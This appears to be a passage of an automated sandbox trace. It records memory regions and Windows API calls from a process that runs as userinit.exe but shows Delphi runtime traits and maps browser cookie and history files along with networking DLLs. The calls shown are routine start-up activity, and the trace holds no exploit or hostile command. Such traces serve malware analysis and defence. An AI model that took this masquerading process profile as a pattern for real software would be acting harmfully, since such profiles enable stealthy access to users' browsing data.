filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 5679
start_va = 0x4e0000
end_va = 0x51ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 5680
start_va = 0x4a0000
end_va = 0x4a7fff
entry_point = 0x4a0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 5681
start_va = 0x4b0000
end_va = 0x4bffff
entry_point = 0x4b0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 5682
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 5683
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 5687
start_va = 0x30c0000
end_va = 0x32dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000030c0000"
filename = ""
Region:
id = 5688
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 5689
start_va = 0x30c0000
end_va = 0x326ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000030c0000"
filename = ""
Region:
id = 5690
start_va = 0x32a0000
end_va = 0x32dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000032a0000"
filename = ""
Region:
id = 5691
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 5692
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 5693
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 5694
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 5695
start_va = 0x7e0000
end_va = 0x89ffff
entry_point = 0x7e0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 287
os_tid = 0x3d8
[0177.717] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0177.718] GetKeyboardType (nTypeFlag=0) returned 4
[0177.718] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0177.718] GetStartupInfoA (in: lpStartupInfo=0x20fb24 | out: lpStartupInfo=0x20fb24*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0177.718] GetVersion () returned 0x1db10106
[0177.718] GetVersion () returned 0x1db10106
[0177.718] GetCurrentThreadId () returned 0x3d8
[0177.718] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x20f620, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0177.718] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20f4fb, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0177.718] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x20f610 | out: phkResult=0x20f610*=0x0) returned 0x2
[0177.718] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x20f610 | out: phkResult=0x20f610*=0x0) returned 0x2
[0177.718] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x20f610 | out: phkResult=0x20f610*=0x0) returned 0x2
[0177.718] lstrcpynA (in: lpString1=0x20f4fb, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0177.718] GetThreadLocale () returned 0x409
[0177.718] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x20f60b, cchData=5 | out: lpLCData="ENU") returned 4
[0177.719] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0177.719] lstrcpynA (in: lpString1=0x20f518, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0177.719] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0177.719] lstrcpynA (in: lpString1=0x20f518, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0177.719] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0177.719] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0177.720] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x903640
[0177.720] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x540000
[0177.720] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x904640
[0177.720] VirtualAlloc (lpAddress=0x540000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x540000
[0177.720] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0177.720] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0177.720] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0177.720] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0177.720] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0177.720] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0177.720] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x20f744, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x20f730, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0177.721] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x20f730, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0177.721] GetVersionExA (in: lpVersionInformation=0x20fac8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20fac8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0177.721] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0177.721] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0177.721] GetThreadLocale () returned 0x409
[0177.722] GetThreadLocale () returned 0x409
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Jan") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="January") returned 8
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Feb") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="February") returned 9
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Mar") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="March") returned 6
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Apr") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="April") returned 6
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="May") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="May") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Jun") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="June") returned 5
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Jul") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="July") returned 5
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Aug") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="August") returned 7
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Sep") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="September") returned 10
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Oct") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="October") returned 8
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Nov") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="November") returned 9
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Dec") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="December") returned 9
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Sun") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Sunday") returned 7
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Mon") returned 4
[0177.722] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Monday") returned 7
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Tue") returned 4
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Tuesday") returned 8
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Wed") returned 4
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Wednesday") returned 10
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Thu") returned 4
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Thursday") returned 9
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Fri") returned 4
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Friday") returned 7
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Sat") returned 4
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x20f9a0, cchData=256 | out: lpLCData="Saturday") returned 9
[0177.723] GetThreadLocale () returned 0x409
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x20f9fc, cchData=256 | out: lpLCData="$") returned 2
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x20f9fc, cchData=256 | out: lpLCData="0") returned 2
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x20f9fc, cchData=256 | out: lpLCData="0") returned 2
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x20faf4, cchData=2 | out: lpLCData=",") returned 2
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x20faf4, cchData=2 | out: lpLCData=".") returned 2
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x20f9fc, cchData=256 | out: lpLCData="2") returned 2
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x20faf4, cchData=2 | out: lpLCData="/") returned 2
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x20f9fc, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0177.723] GetThreadLocale () returned 0x409
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x20f9c8, cchData=256 | out: lpLCData="1") returned 2
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x20f9fc, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0177.723] GetThreadLocale () returned 0x409
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x20f9c8, cchData=256 | out: lpLCData="1") returned 2
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x20faf4, cchData=2 | out: lpLCData=":") returned 2
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x20f9fc, cchData=256 | out: lpLCData="AM") returned 3
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x20f9fc, cchData=256 | out: lpLCData="PM") returned 3
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x20f9fc, cchData=256 | out: lpLCData="0") returned 2
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x20f9fc, cchData=256 | out: lpLCData="0") returned 2
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x20f9fc, cchData=256 | out: lpLCData="0") returned 2
[0177.723] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x20faf4, cchData=2 | out: lpLCData=",") returned 2
[0177.724] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0177.724] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0177.725] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0177.725] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0177.725] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0177.725] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0177.725] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0177.725] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0177.725] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0177.725] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0177.725] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0177.725] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0177.725] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0177.725] GetDC (hWnd=0x0) returned 0xed010836
[0177.725] GetDeviceCaps (hdc=0xed010836, index=90) returned 96
[0177.725] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0177.726] GetDC (hWnd=0x0) returned 0xed010836
[0177.726] GetDeviceCaps (hdc=0xed010836, index=104) returned 0
[0177.726] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0177.726] CreatePalette (plpal=0x20f758) returned 0x3208088b
[0177.726] GetStockObject (i=7) returned 0x1b00017
[0177.726] GetStockObject (i=5) returned 0x1900015
[0177.726] GetStockObject (i=13) returned 0x18a002e
[0177.726] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0177.726] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0177.726] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0177.726] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
